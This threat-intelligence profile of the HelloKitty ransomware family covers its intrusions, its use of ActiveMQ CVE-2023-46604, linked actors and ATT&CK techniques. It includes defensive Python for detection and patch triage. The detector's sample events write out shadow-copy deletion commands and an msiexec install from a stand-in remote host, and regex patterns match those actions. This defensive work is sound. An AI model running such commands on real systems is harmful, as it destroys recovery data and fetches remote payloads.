HELLOKITTY
HelloKitty is a human-operated double-extortion ransomware family active since at least November 2020. Its operators compromise corporate networks, steal data, encrypt systems, and threaten to leak the stolen data publicly if the victim does not pay. The most publicized incident was the February 2021 attack on CD Projekt Red, in which the operators claimed to have stolen source code for Cyberpunk 2077, The Witcher 3, Gwent, and other games. The malware has also been deployed by other actors: Vice Society, which uses preexisting ransomware strains such as HelloKitty rather than a locker of its own and has disproportionately targeted the education sector, and DEV-0230, which Microsoft reported developed and deployed both FiveHands and HelloKitty and often gained access through DEV-0193's BazaLoader infrastructure.
The family targets both Windows and Linux. By summer 2021 the group had begun using a Linux variant aimed at VMware ESXi hosts, and HelloKitty is listed among the ransomware families targeting ESXi and other Linux systems. On compromised Windows hosts the malware deletes Volume Shadow Copies, including via WMI, to inhibit recovery, and it uses an embedded RSA-2048 public key in its encryption of victim data, so files cannot be recovered without the operators' private key.
HelloKitty has been deployed both through exploitation of public-facing services and in hands-on intrusions. Rapid7 observed exploitation of Apache ActiveMQ CVE-2023-46604 to deploy HelloKitty in multiple customer environments; the affected organizations were running outdated ActiveMQ versions, and post-exploitation activity included attempts to load remote binaries named M2.png and M4.png via MSIExec. Rapid7 attributed the activity to HelloKitty based on the ransom note and other available evidence. HelloKitty has also been cited in reporting on ransomware activity targeting SonicWall SMA appliances, which noted prior targeting of those appliances by HelloKitty.
In reporting the family is associated with the names DeathRansom and FiveHands, and possibly with Abyss Locker; the HelloKitty build used against CD Projekt Red was reportedly derived from DEATHRANSOM. In 2023 the complete source code of the first HelloKitty version was leaked on a Russian-speaking hacking forum; researchers including Michael Gillespie assessed the leak as legitimate and matching the version in use when the operation launched in 2020. The leaked archive reportedly contained a Microsoft Visual Studio solution for the encryptor and decryptor together with the NTRUEncrypt library. Later reporting links the Kraken ransomware group to remnants of the HelloKitty operation. Because the encryptor changed over time, older FBI indicators of compromise may be outdated.
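The two host-level behaviours described above (shadow-copy deletion, including through WMI, and MSIExec fetching a remote package such as the M2.png/M4.png binaries) are both visible in process-creation telemetry. The following is an added example, not code from this page or from any vendor report: it runs simple command-line detections over a constructed set of events. The event shape (host, image, command line, parent image) loosely follows Sysmon Event ID 1 fields, and the hostnames, paths and IP address are invented.

```python
"""Flag HelloKitty-associated process behaviour in constructed process-creation events.

Added example (not from the page or any vendor). Detections:
  1. Volume Shadow Copy deletion via vssadmin, wmic or PowerShell/WMI.
  2. msiexec.exe installing a package from an http(s) URL.
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    image: str           # full path of the created process
    command_line: str
    parent_image: str


# Constructed sample telemetry; hostnames, paths and the 192.0.2.10 address are invented.
SAMPLE_EVENTS = [
    ProcEvent("srv01", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("srv01", r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic shadowcopy delete", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("srv02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c \"Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }\"",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("mq01", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /q /i http://192.0.2.10/M2.png",
              r"C:\Program Files\Java\jre\bin\java.exe"),
    ProcEvent("mq01", r"C:\Windows\System32\msiexec.exe",
              "msiexec /i C:\\Temp\\agent.msi /qn", r"C:\Windows\explorer.exe"),
    ProcEvent("ws07", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin list shadows", r"C:\Windows\System32\cmd.exe"),
]

SHADOW_DELETE_PATTERNS = [
    # vssadmin delete shadows [/all] [/quiet]
    re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    # wmic shadowcopy delete (the WMI path)
    re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I),
    # PowerShell: Win32_ShadowCopy objects passed to .Delete() or Remove-WmiObject/Remove-CimInstance
    re.compile(r"win32_shadowcopy.*(\.delete\(\)|remove-(wmi|cim)(object|instance))", re.I),
]
# msiexec with /i (install) pointing at a remote package, regardless of file extension
REMOTE_MSI_PATTERN = re.compile(r"\bmsiexec(\.exe)?\b.*\s/i\s+https?://", re.I)


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection names an event matches (empty list if nothing fires)."""
    hits = []
    if any(p.search(ev.command_line) for p in SHADOW_DELETE_PATTERNS):
        hits.append("shadow_copy_deletion")
    if REMOTE_MSI_PATTERN.search(ev.command_line):
        hits.append("msiexec_remote_package")
    return hits


def scan(events: list[ProcEvent]) -> dict[str, list[tuple[str, str]]]:
    """Group hits per host so the analyst sees the sequence on each machine."""
    findings: dict[str, list[tuple[str, str]]] = {}
    for ev in events:
        for name in classify(ev):
            findings.setdefault(ev.host, []).append((name, ev.command_line))
    return findings


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        for name, cmd in hits:
            print(f"{host}: {name}: {cmd}")
```

A shadow-copy deletion alone is noisy in environments with backup tooling; the grouping by host is there so that a deletion immediately preceded by a remote-package install from an application server process (here a Java parent, matching the ActiveMQ case) can be prioritised over an isolated vssadmin run.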
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories.
Red Canary detected an adversary executing discovery commands on dozens of cloud-based Linux endpoints vulnerable to a critical remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ... Security researchers have previously identified adversaries exploiting CVE-2023-46604 for malware deployment, to spread TellYouThePass, Ransomhub and HelloKitty ransomware, along with Kinsing... Finally, the adversary used curl to download two ActiveMQ JAR files... These two JAR files constitute a legitimate patch for CVE-2023-46604.
The TTPs are nothing new. They include initial network access through compromised credentials, exploitation of known vulnerabilities (e.g., PrintNightmare)...
Mandiant said in April that the CVE-2021-20016 SMA 100 zero-day was exploited to deploy a new ransomware strain known as FiveHands... Before patches were released in late February 2021, the same bug was abused indiscriminately in the wild.
Groups observed using it
4 distinct threat actors attributed by public researchers.
Rather than using or developing their own locker payload, Vice Society operators have deployed third-party ransomware in their intrusions, including HelloKitty, Five Hands, and Zeppelin.
This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.
A threat actor has leaked the complete source code for the first version of the HelloKitty ransomware on a Russian-speaking hacking forum, claiming to be developing a new, more powerful encryptor.
HELLOKITTY ransomware—used to target Polish video game developer CD Projekt Red—is reportedly built from DEATHRANSOM.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
“The recently disclosed Apache ActiveMQ remote code execution (RCE) flaw, CVE-2023-46604 is being exploited to spread ransomware binaries… exploiting the serialized class types in the OpenWire protocol that enables attackers to execute arbitrary shell commands.”
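Because the ActiveMQ intrusions hit hosts running outdated broker versions, the first practical check is a version comparison against the fixed releases. The following is an added example, not code from this page or from the Apache ActiveMQ project. The patched versions (5.15.16, 5.16.7, 5.17.6, 5.18.3) are those named in the Apache advisory for CVE-2023-46604; how the version string is collected (a broker jar filename, a console banner, an asset inventory) is left to the caller and is an assumption here, as are the hostnames in the sample inventory.

```python
"""Classify Apache ActiveMQ version strings against the CVE-2023-46604 fix lines.

Added example; not code from this page or from the Apache ActiveMQ project.
Fixed releases per branch come from the Apache security advisory for
CVE-2023-46604. Version strings are assumed to contain an x.y.z triple.
"""
from __future__ import annotations
import re

# First patched release on each maintained 5.x branch, keyed by (major, minor).
FIXED_PATCH_BY_BRANCH = {
    (5, 15): 16,   # 5.15.16
    (5, 16): 7,    # 5.16.7
    (5, 17): 6,    # 5.17.6
    (5, 18): 3,    # 5.18.3
}

VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text: str) -> tuple[int, int, int]:
    """Extract the first x.y.z version from text such as 'activemq-broker-5.17.3.jar'
    or 'ActiveMQ/5.18.2'. Raises ValueError when no version is present."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    major, minor, patch = (int(g) for g in m.groups())
    return major, minor, patch


def is_vulnerable(version: str) -> bool:
    """True if the version predates the CVE-2023-46604 fix for its branch.

    Per the advisory every 5.x release below 5.15.16 is affected (covering the
    older 5.8-5.14 releases), and on 5.15/5.16/5.17/5.18 a release is affected
    when its patch number is below the branch's fix. Versions outside 5.x
    (e.g. 6.0.0, shipped after the fix) are treated as not affected.
    """
    major, minor, patch = parse_version(version)
    if major != 5:
        return False
    if minor < 15:
        return True
    fixed = FIXED_PATCH_BY_BRANCH.get((major, minor))
    if fixed is None:
        # A 5.x branch newer than 5.18 would postdate the advisory; treat as fixed.
        return False
    return patch < fixed


def triage(inventory: dict[str, str]) -> dict[str, str]:
    """Map host -> 'VULNERABLE' / 'patched' / 'unknown' for a host -> version-string inventory."""
    out: dict[str, str] = {}
    for host, ver in inventory.items():
        try:
            out[host] = "VULNERABLE" if is_vulnerable(ver) else "patched"
        except ValueError:
            out[host] = "unknown"
    return out


# Constructed inventory for the example; hostnames and versions are invented.
SAMPLE_INVENTORY = {
    "mq-prod-01": "activemq-broker-5.17.3.jar",
    "mq-prod-02": "ActiveMQ/5.18.3",
    "mq-legacy": "5.15.9",
    "mq-new": "apache-activemq-6.0.0",
    "mq-unknown": "activemq",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

Hosts that come back "unknown" deserve a manual look rather than being dropped: a broker whose version cannot be read from inventory is exactly the kind of forgotten instance that was running an old release in the reported intrusions.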
Execution
3 techniques
Windows Management Instrumentation (T1047). The supporting corpus repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions, e.g. 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.' For HelloKitty the documented use of WMI is deletion of Volume Shadow Copies on compromised Windows hosts.
Stealth
2 techniques
Discovery
5 techniques
Process Discovery (T1057). The supporting corpus repeatedly describes malware and threat actors obtaining lists of running processes with utilities and APIs such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot and EnumProcesses to enumerate active processes on victim systems.
System Information Discovery (T1082). Examples from the corpus: "4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands".
Lateral Movement
1 technique
Exfiltration
1 technique
Impact
4 techniques
In a recent intrusion, we identified a ransomware deployment that appended the file extension .ViceSociety to all encrypted files...
“EncDLL acts similarly to ransomware, searching and ending a particular set of processes before starting the encryption process…”
IOCs tracked for this family
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
28 sources tracked across advisories, community write-ups, and news.
Named ransomware group referenced as a destination for former Conti members; no additional technical details provided.
Ransomware family/cartel referenced as the predecessor/remnant source for the Kraken group.
Referenced as a prior/notorious ransomware operation/cartel whose remnants are linked to Kraken.
Ransomware operation (prominent in 2021) referenced as the predecessor/related operation to Kraken; noted to have attempted rebranding after its source code leak.